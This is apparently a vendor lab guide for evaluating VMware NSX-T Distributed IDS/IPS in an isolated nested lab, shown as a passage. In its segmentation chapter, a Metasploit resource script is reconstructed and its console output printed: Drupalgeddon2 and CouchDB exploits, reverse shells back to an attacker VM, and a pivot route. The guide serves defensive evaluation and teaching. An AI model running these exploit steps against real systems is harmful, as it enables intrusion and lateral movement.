├── 3.1
├── Nested Lab Deployment-3.1.ps1
├── README.md
└── docs
│ ├── 1-Requirements.md
│ ├── 10-Segmentation.md
│ ├── 11-Conclusion.md
│ ├── 2-CustomizeScript.md
│ ├── 3-RunScript.md
│ ├── 4-VerifyDeployment.md
│ ├── 5-InitialConfiguration.md
│ ├── 6-DetectingASimpleIntrusion.md
│ ├── 7-DetectinganAdvancedAttack.md
│ ├── 8-AdvancedConfiguration-302.md
│ ├── 8-PreventinganAttack.md
│ ├── 9-Logging.md
│ ├── ClearingIDSEvents.md
│ └── assets
│ └── images
│ ├── IDPS_POC_1.PNG
│ ├── IDPS_POC_10.PNG
│ ├── IDPS_POC_11.PNG
│ ├── IDPS_POC_12.PNG
│ ├── IDPS_POC_13.PNG
│ ├── IDPS_POC_14.PNG
│ ├── IDPS_POC_15.PNG
│ ├── IDPS_POC_16.PNG
│ ├── IDPS_POC_17.PNG
│ ├── IDPS_POC_18.PNG
│ ├── IDPS_POC_19.PNG
│ ├── IDPS_POC_2.PNG
│ ├── IDPS_POC_20.PNG
│ ├── IDPS_POC_21.PNG
│ ├── IDPS_POC_22.PNG
│ ├── IDPS_POC_23.PNG
│ ├── IDPS_POC_24.PNG
│ ├── IDPS_POC_25.PNG
│ ├── IDPS_POC_26.PNG
│ ├── IDPS_POC_27.PNG
│ ├── IDPS_POC_27_SMALL.PNG
│ ├── IDPS_POC_28.gif
│ ├── IDPS_POC_29.gif
│ ├── IDPS_POC_3.PNG
│ ├── IDPS_POC_30.PNG
│ ├── IDPS_POC_31.PNG
│ ├── IDPS_POC_32.PNG
│ ├── IDPS_POC_33.PNG
│ ├── IDPS_POC_34.PNG
│ ├── IDPS_POC_35.PNG
│ ├── IDPS_POC_36.PNG
│ ├── IDPS_POC_37.PNG
│ ├── IDPS_POC_38.PNG
│ ├── IDPS_POC_39.PNG
│ ├── IDPS_POC_4.PNG
│ ├── IDPS_POC_40.PNG
│ ├── IDPS_POC_41.PNG
│ ├── IDPS_POC_42.PNG
│ ├── IDPS_POC_43.PNG
│ ├── IDPS_POC_44.PNG
│ ├── IDPS_POC_45.PNG
│ ├── IDPS_POC_46.PNG
│ ├── IDPS_POC_47.PNG
│ ├── IDPS_POC_48.PNG
│ ├── IDPS_POC_49.PNG
│ ├── IDPS_POC_5.PNG
│ ├── IDPS_POC_50.PNG
│ ├── IDPS_POC_51.PNG
│ ├── IDPS_POC_52.PNG
│ ├── IDPS_POC_53.PNG
│ ├── IDPS_POC_54.PNG
│ ├── IDPS_POC_55.PNG
│ ├── IDPS_POC_56.PNG
│ ├── IDPS_POC_57.PNG
│ ├── IDPS_POC_58.PNG
│ ├── IDPS_POC_59.PNG
│ ├── IDPS_POC_6.PNG
│ ├── IDPS_POC_60.PNG
│ ├── IDPS_POC_61.PNG
│ ├── IDPS_POC_62.PNG
│ ├── IDPS_POC_7.PNG
│ ├── IDPS_POC_8.PNG
│ ├── IDPS_POC_9.PNG
│ ├── NSX_Logo.jpeg
│ └── placeholder.tmp
├── Images
├── IDPS_POC_1.PNG
├── IDPS_POC_10.PNG
├── IDPS_POC_11.PNG
├── IDPS_POC_12.PNG
├── IDPS_POC_13.PNG
├── IDPS_POC_14.PNG
├── IDPS_POC_18.PNG
├── IDPS_POC_2.PNG
├── IDPS_POC_3.PNG
├── IDPS_POC_4.PNG
├── IDPS_POC_40.PNG
├── IDPS_POC_41.PNG
├── IDPS_POC_42.PNG
├── IDPS_POC_5.PNG
├── IDPS_POC_6.PNG
├── IDPS_POC_7.PNG
├── IDPS_POC_8.PNG
├── IDPS_POC_9.PNG
├── placeholder.tmp
├── screenshot-1.png
└── screenshot-2.png
├── Nested Lab Deployment-3.1.ps1
├── Nested Lab Deployment.ps1
├── README.md
└── docs
├── 1-Requirements.md
├── 10-Conclusion.md
├── 2-CustomizeScript.md
├── 3-RunScript.md
├── 4-VerifyDeployment.md
├── 5-InitialConfiguration.md
├── 6-BasicAttackScenario.md
├── 7-LateralMovementScenario.md
├── 8-AdvancedConfiguration-302.md
├── 8-AdvancedConfiguration.md
├── 9-Segmentation.md
├── ClearingIDSEvents.md
└── assets
└── images
├── IDPS_POC_1.PNG
├── IDPS_POC_10.PNG
├── IDPS_POC_11.PNG
├── IDPS_POC_12.PNG
├── IDPS_POC_13.PNG
├── IDPS_POC_14.PNG
├── IDPS_POC_15.PNG
├── IDPS_POC_16.PNG
├── IDPS_POC_17.PNG
├── IDPS_POC_18.PNG
├── IDPS_POC_19.PNG
├── IDPS_POC_2.PNG
├── IDPS_POC_20.PNG
├── IDPS_POC_21.PNG
├── IDPS_POC_22.PNG
├── IDPS_POC_23.PNG
├── IDPS_POC_24.PNG
├── IDPS_POC_25.PNG
├── IDPS_POC_26.PNG
├── IDPS_POC_27.PNG
├── IDPS_POC_27_SMALL.PNG
├── IDPS_POC_28.gif
├── IDPS_POC_29.gif
├── IDPS_POC_3.PNG
├── IDPS_POC_30.PNG
├── IDPS_POC_31.PNG
├── IDPS_POC_32.PNG
├── IDPS_POC_33.PNG
├── IDPS_POC_34.PNG
├── IDPS_POC_35.PNG
├── IDPS_POC_36.PNG
├── IDPS_POC_37.PNG
├── IDPS_POC_38.PNG
├── IDPS_POC_39.PNG
├── IDPS_POC_4.PNG
├── IDPS_POC_40.PNG
├── IDPS_POC_41.PNG
├── IDPS_POC_42.PNG
├── IDPS_POC_43.PNG
├── IDPS_POC_44.PNG
├── IDPS_POC_45.PNG
├── IDPS_POC_46.PNG
├── IDPS_POC_5.PNG
├── IDPS_POC_6.PNG
├── IDPS_POC_7.PNG
├── IDPS_POC_8.PNG
├── IDPS_POC_9.PNG
├── NSX_Logo.jpeg
└── placeholder.tmp
/3.1/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | # NSX-T 3.1 - Distributed IDS/IPS Evaluation and Lab Guide
6 |
7 |
8 |
9 |
10 |
11 | ---
12 | ## Overview
13 | The goal of this evaluation is to allow customers to get hands-on experience with the [NSX Distributed IDS/IPS](https://www.vmware.com/products/nsx-distributed-ids-ips.html). The expectation of people participating in the PoV is that they will complete the exercises outlined in this guide in order to become familiar with the key capabilities offered by the NSX Distributed IDS/IPS. While not the focus of this guide, participants will also gain basic experience with the Distributed Firewall and other NSX capabilities during this evaluation process.
14 |
15 | While this guide is quite prescriptive, participants can choose to modify any part of the workflow as desired. The guide is primarily focused on getting customers familiar with IDS/IPS, hence **the deployment of the lab environment and the rest of the configuration is automated through the use of a provided PowerShell script**. After meeting the pre-requisites and running the script, a fully configured nested NSX-T environment is available to participants, including a number of attacker and victim workloads which are used as part of the IDS/IPS exercises. Once the nested lab has been deployed, the lab guide walks users through a number of attack scenarios, using tools like **Metasploit** to showcase the value of the NSX Distributed IDS/IPS.
16 | If you already have the lab deployed, you can skip modules 1-4 of this guide.
17 |
18 | ## Introducing the VMware Service-defined Firewall
19 |
20 | 
21 |
22 | The VMware Service-defined Firewall is VMware’s solution to secure east-west traffic across multi-cloud environments and is made up of 3 main components. First of all, we have our distributed firewall, which enables micro-segmentation. The distributed firewall is in essence an in-kernel firewall that sits at the vNIC of every workload in the environment, enabling any level of filtering: micro-segmentation between the tiers of an application, macro-segmentation (for example, isolating production from development workloads), or anything in between, completely independent of the underlying networking. Over the last few years, we’ve evolved the distributed firewall into a full Layer 7 stateful firewall.
23 |
24 | NSX Intelligence is our distributed visibility and analytics platform, fully integrated into NSX. It provides visibility of all flows without having to rely on traditional mechanisms such as NetFlow or copying all traffic, and it also provides policy formulation, which enables customers to get to full micro-segmentation much quicker. With NSX-T 3.0 we’ve added the Distributed IDS/IPS, which is based on the same distributed architecture, enabling customers for the first time to have a network-based IDS/IPS that sits at the vNIC of every workload, with the ability to intercept every flow, without having to hairpin any traffic, regardless of network connectivity.
25 |
26 | ## Introducing the NSX Distributed IDS/IPS
27 |
28 | One of the key challenges with traditional network-based IDS/IPS solutions is that they rely on a massive amount of traffic being hairpinned or copied across to a centralized IPS appliance. This often requires re-architecting the network, and it also means that growing organizations have to continuously keep adding firewalls or IDS appliances to their centralized cluster to keep up with the growing amount of traffic that needs inspection.
29 | Another challenge with these solutions is that they don't offer protection against lateral movement of attacks within a particular network segment. If two application workloads are deployed in the same VLAN, there isn’t any feasible way to insert an inline IPS appliance between these workloads and repeat that for all the workloads in your entire datacenter.
30 | Furthermore, in virtualized datacenters, by leveraging DRS and vMotion, workloads often move to other hosts, clusters or datacenters. This means that traffic now gets redirected to another IPS appliance which has no context of the existing flow and may even have a different policy applied.
31 | Finally, centralized, network-based IDS/IPSes have very little understanding of the context of a flow. They just look at network traffic without knowing much about where the flow originated and whether or not the target of an attack is potentially vulnerable. As a result, all traffic needs to be matched against several thousands of signatures. Signatures that detect an exploit against a vulnerability in Apache are also applied to a server that runs MySQL, and so on. This results in two key challenges. One is a high number of false positives, which makes it difficult for a security operator to distinguish important events that require immediate action from all the other ones, especially if the events don’t include context about who the victim is and what’s running on that victim machine. A second challenge with having to run all traffic through all signatures is that it significantly reduces throughput.
32 |
33 | The NSX Distributed IDS/IPS combines some of the best qualities of host-based IPS solutions with the best qualities of network-based IPS solutions to provide a radically different solution which enables Intrusion Detection and Prevention at the granularity of a workload and the scale of the entire datacenter.
34 |
35 | Similar to the operational model of the distributed firewall, the NSX distributed IDS/IPS is deployed in the hypervisor when NSX-T is enabled on that hypervisor. It does not require the deployment of any additional appliances on that hypervisor, on the guest VM or anywhere in the network.
36 |
37 | Instead of hairpinning traffic to a centralized IDS appliance across the network, IDS is applied right at the source or destination of the flow, as it leaves or enters a workload. As is the case with our distributed firewall, this means there is no need to re-architect the network to apply IDS/IPS, and it also means that we can inspect traffic between workloads regardless of whether these workloads are on the same VLAN or logical segment or on different VLANs. The Distributed Firewall and IDS/IPS are applied to the traffic even before it hits the distributed switch. Almost invariably, the actual objective of an attack is not the same as where the attacker initially gained access; this means that an attacker will try to move through the environment in order to steal the valuable data they are after. Hence, being able to defend not just against the initial attack vector, but also against lateral movement, is critical. Micro-segmentation using the distributed firewall is key in reducing the attack surface and makes lateral movement a lot more difficult. Now, for the first time, it becomes operationally feasible to front-end each of your workloads with an Intrusion Detection and Prevention service to detect and block attempts at exploiting vulnerabilities wherever they may exist, regardless of whether the attacker is trying to gain initial access to the environment or has already compromised a workload on the same VLAN and is now trying to move laterally to their target database on that same VLAN.
38 |
39 | Our largest and most successful customers heavily rely on context to micro-segment their environment. They leverage security groups based on tags and other constructs to create a policy that is tied directly to the application itself rather than to network constructs like IP addresses and ports. This same context is also a very important differentiator which solves two key challenges seen with traditional IDS and IPS solutions. First of all, because we are embedded in the hypervisor, we have access to a lot more context than we could learn by just sitting on the network. We know, for instance, the name of each workload, the application it’s part of, and so on. VMware Tools and the Guest Introspection framework can provide us with additional context, such as the version of the operating system that is running on each guest and even what process or user has generated a particular flow. If a database server is known to be vulnerable to a specific vulnerability that is being exploited right now, it obviously warrants immediate attention, while a network admin triggering an IPS signature by running a scan should be far less of an immediate concern.
40 |
41 | In addition to enabling the appropriate prioritization, the same context can also be used to reduce the number of false positives and increase the number of zero-false-positive workloads, as we have a good idea whether or not a target is potentially vulnerable, therefore reducing the amount of alerts that are often overwhelming with a traditional network-based solution. Finally, leveraging context, we can enable only the signatures that are relevant to the workloads we are protecting. If a distributed IDS instance is applied to an Apache server, we can enable only the signatures that are relevant and not the vast majority of signatures that are irrelevant to this workload. This drastically reduces the performance impact seen with traditional IDS/IPS.
42 |
43 | ---
44 | ## Disclaimer and acknowledgements
45 | This lab provides and leverages common pen-test tools including Metasploit, as well as purposefully vulnerable workloads built using [Vulhub](https://github.com/vulhub/vulhub). Please only use these tools for the intended purpose of completing the PoC, isolate the lab environment properly from any other environment, and discard it when the PoC has been completed.
46 |
47 | The automation script is based on work done by [William Lam](https://github.com/lamw) with additional vSphere and NSX automation by [Madhu Krishnarao](https://github.com/madhukark)
48 |
49 | ---
50 | ## Changelog
51 |
52 | * **01/7/2021**
53 | * Completion of NSX-T 3.1 version of the guide
54 | * **07/8/2020**
55 | * Initial partial draft of the guide
56 | * **08/18/2020**
57 | * Initial completed guide
58 | ---
59 | ## Intended Audience
60 | This evaluation guide is intended for existing and future NSX customers who want to evaluate the NSX Distributed IDS/IPS functionality. Ideally, the evaluation process involves people covering these roles:
61 |
62 | * CISO Representative
63 | * Data Center Infrastructure Team
64 | * Network Architects
65 | * Security Architects
66 | * Security Operations Center Analyst
67 | * Enterprise Application Owner
68 |
69 | ---
70 | ## Resources commitment and suggested timeline
71 | The expected time commitment to complete the evaluation process is about 6 hours. This includes the time it takes for the automated deployment of the nested lab environment. We suggest splitting this time across 2 weeks. The below table provides an estimate of the time it takes to complete each task:
72 |
73 | | Task | Estimated Time to Complete | Suggested Week |
74 | | ------------- | ------------- | ------------- |
75 | | Customize Deployment Script Variables | 30 minutes | Week 1 |
76 | | Run Deployment Script | 90 minutes | Week 1 |
77 | | Verify Lab Deployment | 30 minutes | Week 1 |
78 | | Initial IDS/IPS Configuration | 30 minutes | Week 1 |
79 | | Detecting a Simple Intrusion | 30 minutes | Week 2 |
80 | | Detecting an Advanced Attack | 60 minutes | Week 2 |
81 | | Preventing an Attack | 30 minutes | Week 2 |
82 | | Optional: Logging to an external collector | 30 minutes | Week 2 |
83 | | Optional: Segmenting the Environment| 60 minutes | Week 2 |
84 |
85 | ---
86 | ## Support during the evaluation Process
87 |
88 | Existing NSX customers should reach out to their NSX account team for support during the evaluation process.
89 |
90 | ---
91 | ## Table of Contents
92 | * [Requirements](docs/1-Requirements.md)
93 | * [Customize Deployment Script](docs/2-CustomizeScript.md)
94 | * [Run Deployment Script](docs/3-RunScript.md)
95 | * [Verify Lab Deployment](docs/4-VerifyDeployment.md)
96 | * [Initial IDS/IPS Configuration](docs/5-InitialConfiguration.md)
97 | * [Detecting a simple Intrusion](docs/6-DetectingASimpleIntrusion.md)
98 | * [Detecting an Advanced Attack](docs/7-DetectinganAdvancedAttack.md)
99 | * [Preventing an Attack](docs/8-PreventinganAttack.md)
100 | * [Optional: Logging to an external collector](docs/9-Logging.md)
101 | * [Optional: Segmenting the Environment](docs/10-Segmentation.md)
102 | * [Conclusion](docs/11-Conclusion.md)
103 |
104 | [***Next Step: 1. Requirements***](docs/1-Requirements.md)
105 |
--------------------------------------------------------------------------------
/3.1/docs/1-Requirements.md:
--------------------------------------------------------------------------------
1 |
2 | ## 1. Requirements
3 | ### Introduction to the Lab Deployment Script
4 | Along with this evaluation guide, we are providing a [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1) which automates the lab environment deployment. This script makes it very easy for anyone to deploy a nested vSphere lab environment for learning and educational purposes. All required VMware components (ESXi, vCenter Server, NSX Unified Appliance and Edge) are automatically deployed, attacker and multiple victim workloads are deployed, and NSX-T networking configuration is applied, so that anyone can start testing the NSX Distributed IDS/IPS as soon as the deployment is completed.
5 |
6 | Below is a diagram of what is deployed as part of the solution. You simply need to have an existing vSphere environment running that is managed by vCenter Server and has enough resources (CPU, Memory and Storage) to deploy this "Nested" lab.
7 |
8 | 
9 |
10 | * Gray: Pre-requisites (Physical ESXi Server, vCenter managing the server and a port-group to provide connectivity to the nested lab environment)
11 | * Blue: Management and Edge Components (vCenter, NSX Manager and NSX Edge) Deployed by PowerCLI Script
12 | * Red: External VM running Metasploit and other functions deployed by PowerCLI Script on Physical Environment vCenter
13 | * Yellow: Nested ESXi hypervisors deployed by PowerCLI Script and managed by nested vCenter
14 | * Purple: vSAN datastore across 3 nested ESXi hypervisors configured by PowerCLI Script
15 | * Green: NSX Overlay DMZ Segment and vulnerable Web-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
16 | * Orange: NSX Overlay Internal Segment and vulnerable App-VMs connected to it. Segment created and VMs deployed by PowerCLI Script.
17 |
18 | ### Physical Lab Requirements
19 | Here are the requirements for the NSX-T Distributed IDS/IPS evaluation
20 |
21 | #### vCenter
22 | * vCenter Server running at least vSphere 6.7 or later
23 | * If your physical storage is vSAN, please ensure you've applied the following setting as mentioned [here](https://www.virtuallyghetto.com/2013/11/how-to-run-nested-esxi-on-top-of-vsan.html)
24 |
25 | #### Compute
26 | * Single Physical host running at least vSphere 6.7 or later
27 | * Ability to provision VMs with up to 8 vCPU
28 | * Ability to provision up to 64 GB of memory
29 |
30 | #### Network
31 | * Single pre-configured Standard or Distributed Portgroup (Management VLAN) used to connect the below components of the nested environment. In my example, VLAN-194 is used as this single port-group
32 | * 8 x IP Addresses for VCSA, ESXi, NSX-T Manager, Edge VM Management, Edge VM Uplink and External VM
33 | * 4 x IP Addresses for TEP (Tunnel Endpoint) interfaces on ESXi and Edge VM
34 | * 1 x IP Address for T0 Static Route (optional)
35 | * All IP Addresses should be able to communicate with each other. These can all be in the same subnet (/27). In the example configuration provided, the 10.114.209.128/27 subnet is used for all these IP addresses/interfaces: vCenter, NSX Manager Management Interface, T0 Router Uplink, Nested ESXi VMkernel and TEP interfaces (defined in IP pool), External VM.
36 |
37 | #### Storage
38 | * Ability to provision up to 1TB of storage
39 |
40 | #### Other
41 | * Desktop (Windows, Mac or Linux) with the latest PowerShell Core and PowerCLI 12.0 Core installed. See [instructions here](https://blogs.vmware.com/PowerCLI/2018/03/installing-powercli-10-0-0-macos.html) for more details
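
If you still need to set up PowerCLI, the sketch below shows one way to install and verify it from a PowerShell Core session (assuming access to the public PowerShell Gallery):

```console
# Install PowerCLI from the PowerShell Gallery for the current user
Install-Module -Name VMware.PowerCLI -Scope CurrentUser

# Verify the installed version
Get-Module -Name VMware.PowerCLI -ListAvailable | Select-Object Name, Version

# Labs typically use self-signed certificates; allow PowerCLI to connect to them
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -Confirm:$false
```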
42 |
43 |
44 | ### OVAs and images for the nested Lab
45 | * vSphere 7 & NSX-T OVAs:
46 | * [vCenter Server Appliance 7.0.0B](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=VC700B&productId=974&rPId=47905)
47 | * [NSX-T Manager 3.1.0 OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-310&productId=982&rPId=56490)
48 | * [NSX-T Edge 3.1.0 for ESXi OVA](https://my.vmware.com/group/vmware/downloads/details?downloadGroup=NSX-T-310&productId=982&rPId=56490)
49 | * [Nested ESXi 7.0 OVA - Build 15344619](https://download3.vmware.com/software/vmw-tools/nested-esxi/Nested_ESXi7.0_Appliance_Template_v1.ova)
50 | * External VM and Victim VM OVA - Links to these will be provided to PoV participants by their NSX account team.
51 | * Preferably, the deployed NSX Manager should have Internet access in order to download the latest set of IDS/IPS signatures.
52 |
53 | > **Note**: if you are not entitled or not able to access the above links, you can download a free trial and obtain a license for all of the above through https://www.vmware.com/try-vmware.html
54 | > **Note**: in order to use IDS/IPS, you need to provide either an evaluation license or an NSX ATP Subscription license
55 |
56 |
57 | ---
58 |
59 | [***Next Step: 2. Customize Deployment Script***](2-CustomizeScript.md)
60 |
61 |
--------------------------------------------------------------------------------
/3.1/docs/10-Segmentation.md:
--------------------------------------------------------------------------------
1 |
2 | ## 10. Segmenting the Environment
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this optional exercise, we will leverage the **Distributed Firewall** in order to limit the attack surface.
6 | First, we will apply a **Macro-segmentation** policy which will isolate our **Production** environment and the applications deployed in it from the **Development** environment.
7 | Then, we will implement a **Micro-segmentation** policy, which will employ an **allow-list** to only allow the flows required for our applications to function and block everything else.
8 |
9 | **IMPORTANT**: Prior to this exercise, change the **Mode** for both the **App-Tier** and **Web-Tier** IDS/IPS policy back to **Detect Only**.
10 |
11 | **Macro-Segmentation: Isolating the Production and Development environments**
12 |
13 | The goal of this exercise is to completely isolate workloads deployed in **Production** from workloads deployed in **Development**. All nested workloads were previously tagged to identify which of these environments they were deployed in, and earlier in this lab, you created groups for **Production Applications** and **Development Applications** respectively. In the next few steps, you will create the appropriate firewall rules to achieve this, and then run through the **lateral movement** attack scenario again to see how lateral movement has now been limited to a particular environment.
14 |
15 | ***Create a Distributed Firewall Environment Category Policy***
16 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
17 | 2. Click on the **Environments(0)** Category tab.
18 | 3. Click **ADD POLICY**
19 | 4. Click **New Policy** and change the name of the policy to **Environment Isolation**
20 | 5. Check the checkbox next to the **Environment Isolation** Policy
21 | 6. Click **ADD RULE** twice, and configure the new rules as per the below steps
22 | 7. Rule 1
23 | * Name: **Isolate Production-Development**
24 | * Source: **Production Applications**
25 | * Destination: **Development Applications**
26 | * Services: **ANY**
27 | * Profiles: **NONE**
28 | * Applied To: **Production Applications** , **Development Applications**
29 | * Action: **Drop**
30 | 8. Rule 2
31 | * Name: **Isolate Development-Production**
32 | * Source: **Development Applications**
33 | * Destination: **Production Applications**
34 | * Services: **ANY**
35 | * Profiles: **NONE**
36 | * Applied To: **Production Applications** , **Development Applications**
37 | * Action: **Drop**
38 |
39 | 
40 |
41 | 9. Click **Publish** to publish these rules to the **Distributed Firewall**.
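
If you prefer automation over the UI, the same policy can also be created declaratively through the NSX Policy API. The below is a minimal sketch only: the group paths and the **environment-isolation** policy ID are illustrative and need to match the group IDs that actually exist in your environment (rule 2 mirrors rule 1 with source and destination swapped):

```console
# Hypothetical example: create the Environment Isolation policy via the NSX Policy API
$nsx  = "10.114.209.149"   # lab NSX Manager IP from the sample environment
$cred = Get-Credential     # admin / VMware1!VMware1! in the sample lab
$body = @'
{
  "display_name": "Environment Isolation",
  "category": "Environment",
  "rules": [
    {
      "display_name": "Isolate Production-Development",
      "source_groups": ["/infra/domains/default/groups/Production_Applications"],
      "destination_groups": ["/infra/domains/default/groups/Development_Applications"],
      "services": ["ANY"],
      "scope": ["/infra/domains/default/groups/Production_Applications",
                "/infra/domains/default/groups/Development_Applications"],
      "action": "DROP"
    }
  ]
}
'@
Invoke-RestMethod -Uri "https://$nsx/policy/api/v1/infra/domains/default/security-policies/environment-isolation" `
  -Method Patch -Authentication Basic -Credential $cred -ContentType "application/json" `
  -Body $body -SkipCertificateCheck
```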
42 |
43 | ***Open a SSH/Console session to the External VM***
44 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
45 | * Username **vmware**
46 | * Password **VMware1!**
47 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
48 |
49 | ***Run through the lateral attack scenario (again)***
50 |
51 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM**, which will initiate the complete lateral attack scenario without needing any manual Metasploit steps. If you prefer, you can also manually go through these steps (see the chapter on the Lateral Movement Scenario).
52 |
53 | 1. If you have not previously used this script, you will need to modify it to reflect your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses to match the IP addresses in your environment (a reconstructed example of the file is shown after these steps).
54 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
55 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
56 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
57 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM
58 | * **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
59 | 2. Type **CTRL-O** and confirm to save your changes, then **CTRL-X** to exit **Nano**.
60 | 3. Type **sudo ./attack2.sh** to run the attack scenario
61 |
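For reference, based on the resource commands echoed in the console output below, **attack2.rc** looks roughly like this (IP addresses are from the sample environment):

```console
# attack2.rc - reconstructed from the console output below; substitute your own IPs
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.10.101      # App1-WEB-TIER VM
set RPORT 8080
exploit -z
route add 192.168.20.0/24 1   # route to the Internal subnet via session 1
use exploit/linux/http/apache_couchdb_cmd_exec
set LPORT 4445
set LHOST 10.114.209.151      # External VM (this local machine)
set RHOST 192.168.20.100      # App1-APP-TIER VM
exploit -z
set LPORT 4446
set RHOST 192.168.20.101      # App2-APP-TIER VM
exploit -z
```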
62 | > **Note**: This scripted attack does not upgrade shell sessions to meterpreter sessions, nor does it interact with the established sessions, but it will cause the same signatures to fire on the NSX IDS/IPS.
63 |
64 | ```console
65 |
66 | vmware@ubuntu:~$ sudo ./attack2.sh
67 | [sudo] password for vmware:
68 | [*] Starting thE Metasploit Framework console...\
69 |
70 | Call trans opt: received. 2-19-98 13:24:18 REC:Loc
71 |
72 | Trace program: running
73 |
74 | wake up, Neo...
75 | the matrix has you
76 | follow the white rabbit.
77 |
78 | knock, knock, Neo.
79 |
80 | (`. ,-,
81 | ` `. ,;' /
82 | `. ,'/ .'
83 | `. X /.'
84 | .-;--''--.._` ` (
85 | .' / `
86 | , ` ' Q '
87 | , , `._ \
88 | ,.| ' `-.;_'
89 | : . ` ; ` ` --,.._;
90 | ' ` , ) .'
91 | `._ , ' /_
92 | ; ,''-,;' ``-
93 | ``-..__``--`
94 |
95 | https://metasploit.com
96 |
97 |
98 | =[ metasploit v5.0.95-dev ]
99 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
100 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
101 | + -- --=[ 7 evasion ]
102 |
103 | Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search
104 |
105 | [*] Processing attack2.rc for ERB directives.
106 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
107 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
108 | resource (attack2.rc)> set RHOST 192.168.10.101
109 | RHOST => 192.168.10.101
110 | resource (attack2.rc)> set RPORT 8080
111 | RPORT => 8080
112 | resource (attack2.rc)> exploit -z
113 | [*] Started reverse TCP handler on 10.114.209.151:4444
114 | [*] Sending stage (38288 bytes) to 192.168.10.101
115 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:36632) at 2020-08-18 09:23:54 -0500
116 | [*] Session 1 created in the background.
117 | resource (attack2.rc)> route add 192.168.20.0/24 1
118 | [*] Route added
119 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
120 | [*] Using configured payload linux/x64/shell_reverse_tcp
121 | resource (attack2.rc)> set LPORT 4445
122 | LPORT => 4445
123 | resource (attack2.rc)> set LHOST 10.114.209.151
124 | LHOST => 10.114.209.151
125 | resource (attack2.rc)> set RHOST 192.168.20.100
126 | RHOST => 192.168.20.100
127 | resource (attack2.rc)> exploit -z
128 | [*] Started reverse TCP handler on 10.114.209.151:4445
129 | [*] Generating curl command stager
130 | [*] Using URL: http://0.0.0.0:8080/4u4h7sj6qJrKq
131 | [*] Local IP: http://10.114.209.151:8080/4u4h7sj6qJrKq
132 | [*] 192.168.20.100:5984 - The 1 time to exploit
133 | [*] Client 10.114.209.148 (curl/7.38.0) requested /4u4h7sj6qJrKq
134 | [*] Sending payload to 10.114.209.148 (curl/7.38.0)
135 | [*] Command shell session 2 opened (10.114.209.151:4445 -> 10.114.209.148:20667) at 2020-08-18 09:24:20 -0500
136 | [+] Deleted /tmp/zzdlnybu
137 | [+] Deleted /tmp/ltvyozbf
138 | [*] Server stopped.
139 | [*] Session 2 created in the background.
140 | resource (attack2.rc)> set LPORT 4446
141 | LPORT => 4446
142 | resource (attack2.rc)> set RHOST 192.168.20.101
143 | RHOST => 192.168.20.101
144 | resource (attack2.rc)> exploit -z
145 | [*] Started reverse TCP handler on 10.114.209.151:4446
146 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
147 | [*] Exploit completed, but no session was created.
148 | ```
149 |
150 | 4. Type **sessions -l** to confirm that this time, although the script tried to exploit **APP1-WEB-TIER**, then laterally move to **APP1-APP-TIER** and then move once more to **APP2-APP-TIER**, only 2 reverse shell sessions were established
151 | * One from the **APP1-WEB-TIER** VM
152 | * One from the **APP1-APP-TIER** VM
153 |
154 | > **Note**: The exploit of the **APP2-APP-TIER** VM failed, because the Distributed Firewall policy you just configured isolated the **APP2** workloads that are part of the **Development Applications** Group (Zone) from the **APP1** workloads which are part of the **Production Applications** Group (Zone).
155 |
156 | ```console
157 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
158 |
159 | Active sessions
160 | ===============
161 |
162 | Id Name Type Information Connection
163 | -- ---- ---- ----------- ----------
164 | 1 meterpreter php/linux www-data (33) @ 273e1700c5be 10.114.209.151:4444 -> 192.168.10.101:36632 (192.168.10.101)
165 | 2 shell x64/linux 10.114.209.151:4445 -> 10.114.209.148:20667 (192.168.20.100)
166 | ```
167 |
168 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
169 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
170 | 2. Confirm 3 signatures have fired:
172 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
173 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
174 | * Signature for **Apache CouchDB Remote Privilege Escalation**, with **APP-1-APP-TIER** as Affected VM
175 |
176 | 
177 |
178 | > **Note**: Because the distributed firewall has isolated production from development workloads, we do not see the exploit attempt of the **APP2-APP-TIER** VM.
179 |
180 | This completes the Macro-segmentation exercise. Before moving to the next exercise, follow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
181 |
182 | **Micro-Segmentation: Implementing a zero-trust network architecture for your applications**
183 |
184 | Now that we have isolated production from development workloads, we will micro-segment both of our applications by configuring an **allow-list** policy which explicitly allows only the flows required for our applications to function and blocks anything else. As a result, we will not only prevent lateral movement, but also prevent any reverse shell from being established.
185 |
186 | ***Create Granular Groups***
187 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
188 | 2. Click **ADD GROUP**
189 | 3. Create a Group with the below parameters. Click Apply when done.
190 | * Name **APP1-WEB**
